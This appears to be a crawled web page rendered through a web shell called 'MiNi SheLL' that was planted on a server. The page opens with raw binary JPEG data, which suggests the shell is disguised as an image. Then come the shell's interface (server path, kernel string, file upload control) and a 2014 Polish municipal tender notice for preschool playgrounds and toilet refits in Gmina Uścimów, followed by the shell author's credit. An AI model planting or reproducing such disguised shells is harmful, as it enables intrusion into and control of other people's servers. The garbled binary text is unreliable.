JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140620/132859-N-2014.html

<p class="kh_header"><b>Stary Uścimów: Modernizacja oddziałów przedszkolnych w szkołach podstawowych</b><br>
<b>Numer ogłoszenia: 132859 - 2014; data zamieszczenia: 20.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Uścimów , 21-109 Stary Uścimów, woj. lubelskie, tel. 081 8523026, faks 081 8523026.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w szkołach podstawowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest- Organizacja dwóch placów zabaw i dostosowanie pomieszczeń w dwóch szkołach podstawowych w Gminie Uścimów dla dzieci w wieku 3 - 5 lat w ramach projektu: Modernizacja oddziałów przedszkolnych przy szkołach podstawowych, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
W skład zamówienia wchodzić będą CZĘŚCI takie jak Część 1) Organizacja placu zabaw z dostawą i  montażem urządzeń i wykonanie bezpiecznej nawierzchni dla 2 oddziałów przedszkolnych przy Szkole Podstawowej w ZS w Starym Uścimowie  oraz dostawa i organizacja placu zabaw z montażem urządzeń i wykonaniem bezpiecznej nawierzchni przy Szkole Podstawowej w Nowa Jedlanka . 
Przedmiot zamówienie obejmuje dostawę i montaż urządzeń na placu zabaw .
1SP przy ZS w Starym Uścimowie - Przedmiot zamówienia obejmuje wykonanie następujących prac: 1) Dostawę i montaż urządzeń na placu zabaw. 2)Wykonanie bezpiecznej nawierzchni w strefie bezpieczeństwa urządzeń zabawowych . W ramach obowiązków leżących po stronie Wykonawcy, w celu prawidłowego wykonania robót dotyczących  wykonania robót budowlanych, jest wykonanie wszystkich innych niezbędnych prac potrzebnych do oddania do użytku przedmiotu zamówienia. W cenę zamówienia powinny być wliczone wszelkie koszty ponoszone przez Wykonawcę niezbędne do wykonania przedmiotu zamówienia, w tym koszty wszystkich uzgodnień i odbioru robót. Do oferty należy dołączyć atesty i certyfikaty na całe urządzenia. Niedopuszczalne jest dostarczenie atestu, certyfikatu na poszczególne elementy urządzenia. 
Wyposażenie placu zabaw przy ZS w Starym Uścimowie: 
1)Zakup wyposażenia i montaż placu zabaw - zabawki wielofunkcyjne - tor -szt. 1. 
2)Zakup wyposażenia i montaż placu zabaw - Labirynty ( płyta cała szt- 7 szt , płyta z otworami - 5 szt , płyta trapez - 1 szt , płyta sklepik - 1 szt. lada do labiryntu - 2 szt , dach - 1 szt , panel wejściowy - 2 szt , liczydło - 1 szt , kółko i krzyżyk - 1 szt. peryskop - szt - 1 szt. , kierownica - 1 szt , sklepik z ladą  - 1 szt .- komplet 1 
3 zabawka na sprężynach dwuosobowa - szt 1
4)Wykonanie bezpiecznej nawierzchni placu zabaw pod tor wraz z ogrodzeniem-29 m2 . 
-Zaproponowane przez Wykonawcę urządzenia muszą wskazywać opisane powyżej funkcje, a gabarytowo muszą zostać dopasowane do dzieci w wieku 3-5 lat. Bezpieczna strefa użytkowania dla każdego elementu nie może być mniejsza niż wynikająca z przepisów szczególnych. 
Wszystkie elementy wykończeniowe zastosowane do wykonania wyposażenia placu zabaw winny być wykonane z materiałów lekkich, odpornych i zachowujących kolorystykę w trudnych warunkach atmosferycznych. Urządzenia dla zapewnienia stabilności powinny być kotwione (kotwami stalowymi) w gruncie poprzez betonowanie. 
-Urządzenia podane w dokumentach będących dokumentacją przetargową podane są przykładowe. Dopuszcza się zastosowanie urządzeń równoważnych spełniających funkcje wskazane przez Zamawiającego. 
Szczegółowy opis wraz z rysunkami stanowi załącznik nr 8 do SIWZ .
2.SP w Nowej Jedlance Przedmiot zamówienia obejmuje wykonanie następujących prac: 1) Dostawę i montaż urządzeń na placu zabaw. 2) Wykonanie bezpiecznej nawierzchni w strefie bezpieczeństwa urządzeń zabawowych wraz z ogrodzeniem. W ramach obowiązków leżących po stronie Wykonawcy, w celu prawidłowego wykonania robót dotyczących  wykonania robót budowlanych, jest wykonanie wszystkich innych niezbędnych prac potrzebnych do oddania do użytku przedmiotu zamówienia. W cenę zamówienia powinny być wliczone wszelkie koszty ponoszone przez Wykonawcę niezbędne do wykonania przedmiotu zamówienia, w tym koszty wszystkich uzgodnień i odbioru robót. Do oferty należy dołączyć atesty i certyfikaty na całe urządzenia. Niedopuszczalne jest dostarczenie atestu, certyfikatu na poszczególne elementy urządzenia. 
Wyposażenie placu zabaw przy SP w Nowej Jedlance 
1)Zabawki wielofunkcyjne - zjeżdżalnia  -1 szt.  
2)Zabawki wielofunkcyjne - wieża ( 3-5 latki ) - 1 szt. 
3)Huśtawka podwójna ( 3-5 latki ) - 2 szt. 
4)Karuzela ( 3-5 latki ) - 1 szt. 
5)Zabawki wielofunkcyjne - kładka linowa ( 3-5 latki ) - 1 szt.  
6)Zabawki sprężynowe ( 3-5 latki ) - 1 szt. 
7)Zabawki wielofunkcyjne - most linowy ( 3-5 latki ) - 1 szt. 
8)Domek dla dzieci ( 3-5 latki )  - 1 szt.
9)Nawierzchnia placu zabaw wraz z ogrodzeniem-nawierzchnia pod plac zabaw-65 m2 
-Zaproponowane przez Wykonawcę urządzenia muszą wskazywać opisane powyżej funkcje, a gabarytowo muszą zostać dopasowane do dzieci w wieku 3-5 lat. Bezpieczna strefa użytkowania dla każdego elementu nie może być mniejsza niż wynikająca z przepisów szczególnych. 
Wszystkie elementy wykończeniowe zastosowane do wykonania wyposażenia placu zabaw winny być wykonane z materiałów lekkich, odpornych i zachowujących kolorystykę w trudnych warunkach atmosferycznych. Urządzenia dla zapewnienia stabilności powinny być kotwione (kotwami stalowymi) w gruncie poprzez betonowanie. 
-Urządzenia podane w dokumentach będących dokumentacją przetargową podane są przykładowe. Dopuszcza się zastosowanie urządzeń równoważnych spełniających funkcje wskazane przez Zamawiającego. 
Szczegółowy opis wraz z rysunkami stanowi załącznik nr 8 do SIWZ .
Część 2)Dostosowanie toalet do potrzeb dzieci w wieku 3 - 5 lat. oraz dla personelu
1.SP przy ZS w Starym Uścimowie Dostosowanie toalety w SP w Starym Uścimowie  polega na:
1)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż -umywalek - szt 2
2)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż -podestów do toalet i umywalek podest dziecięcy różowy  - szt 2
3)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż -podestów do toalet i umywalek podest dziecięcy niebieski  - szt 2
4)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - luster - szt 2
5)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - podajnika na mydło  w płynie - szt 2
6)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - podajników na ręczniki papierowe w listwach   - szt 2
7)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - wieszaków łazienkowych   - szt 1
8)dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż -umywalka biała , bateria , syfon   - szt 1
9) dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż -  lustro    - szt 1
10)dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż - podajników na mydło w płynie    - szt 1
11)dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż - podajnik na ręczniki papierowe w listwach   - szt 1
12)dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż - wieszaków łazienkowych- szt 1
13) dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż - zestaw wc kompakt z deską sedesową   - szt 1
-Urządzenia podane w dokumentach będących dokumentacją przetargową podane są przykładowe. Dopuszcza się zastosowanie urządzeń równoważnych spełniających funkcje wskazane przez Zamawiającego. 
Szczegółowy opis wraz z rysunkami stanowi załącznik nr 8 do SIWZ .
2.SP w Nowej Jedlance Dostosowanie toalety w SP w Nowej Jedlance   polega na
1) dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż -podest do toalet  - szt 1
2) dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - półeczka na kubeczki  - szt 1
3)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - lustro  - szt 1
4)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - podajnika na mydło w płynie   - szt 1
5)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - suszarek do rąk  - szt 1
6)dostosowanie toalet do potrzeb dzieci poprzez zakup i montaż - wieszaków łazienkowych   - szt 1
7)dostosowanie toalet do potrzeb personelu poprzez zakup i montaż - lustro  - szt 1
8)dostosowanie toalet do potrzeb personelu poprzez zakup i montaż - podajników na mydło w płynie - szt 1
9)dostosowanie toalet do potrzeb personelu  poprzez zakup i montaż - suszarka do  rąk - szt 1
-Urządzenia podane w dokumentach będących dokumentacją przetargową podane są przykładowe. Dopuszcza się zastosowanie urządzeń równoważnych spełniających funkcje wskazane przez Zamawiającego. 
Szczegółowy opis wraz z rysunkami stanowi załącznik nr 8 do SIWZ .
2.Zamawiający wymaga udzielenia gwarancji jakości na przedmiot zamówienia na okres 36 miesięcy. 
3.Roboty budowlane należy wykonać z zachowaniem szczególnej staranności, zgodnie ze sztuką budowlaną, technologią systemową,  oraz zgodnie z umową, Polskimi Normami przenoszącymi normy europejskie lub normy innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy (odpowiednio do art. 30 ustawy Pzp) z jednoczesnym dopuszczeniem rozwiązań równoważnych, specyfikacją istotnych warunków zamówienia zwaną dalej siwz. Wszystkie materiały i urządzenia niezbędne do wykonania zadania dostarcza Wykonawca. 
4.Przy wykonywaniu robót Wykonawca zobowiązuje się stosować wyroby budowlane i urządzenia o właściwościach użytkowych umożliwiających prawidłowo wykonanym obiektom budowlanym spełnienie wymagań podstawowych, określonych w art. 5 ust. 1 pkt 1 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (j.t. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) - dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z art. 10 cytowanej ustawy i przepisami wykonawczymi. 
5.Wszystkie materiały i urządzenia użyte do wykonania zamówienia muszą posiadać aktualne świadectwa, aprobaty lub certyfikaty dopuszczające do stosowania w budownictwie na terenie RP w tym być zgodnie z wymogami normy PN-EN 1176-2009. 
6.Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i urządzeń nowych, w gatunku I, gwarantujących najwyższą jakość. 
7.Przed złożeniem oferty Wykonawca powinien dokonać wizji terenu budowy oraz jego otoczenia w celu oceny, na własną odpowiedzialność, kosztów i ryzyka wszystkich czynników koniecznych do przygotowania jego rzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze i towarzyszące do prowadzenia robót budowlano - montażowych. 
8.Za wykonanie przedmiotu zamówienia zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe. Wynagrodzenie zostanie zapłacone przez Zamawiającego na rachunek Wykonawcy przelewem w terminie 14 dni od daty wystawienia faktury po dokonaniu odbioru końcowego przedmiotu zamówienia udokumentowanego protokołem odbioru robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.11.12.91-4, 45.22.38.00-4, 37.53.52.00-9, 45.43.12.00-9, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 2 roboty polegające na
Część I -organizacji  placów zabaw o wartości robót co najmniej 70 000,00 zł brutto każda z nich; 
Część II - remoncie łazienek i montażu urządzeń sanitarnych o wartości robót co najmniej 3 000,00 zł brutto każda z nich;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowo tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. dysponują osobami, które będą wykonywać zamówienie lub pisemne zobowiązanie innych podmiotów do udostępnienia tych osób, w tym: 
Część I - 1 osoba posiadająca doświadczenie w kierowaniu co najmniej jedną robotą budowlaną polegającą na budowie placu zabaw ; 
Część II - Wykonawca nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje szczegółowo tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy zawarto we wzorze umowy , która stanowi załącznik nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uguscimow.bip.lubelskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Uścimów , Stary Uścimów 37 , 21-109 Uścimów  - pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 11:00, miejsce: Urząd Gminy Uścimów , Stary Uścimów 37 , 21-109 Uścimów  - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com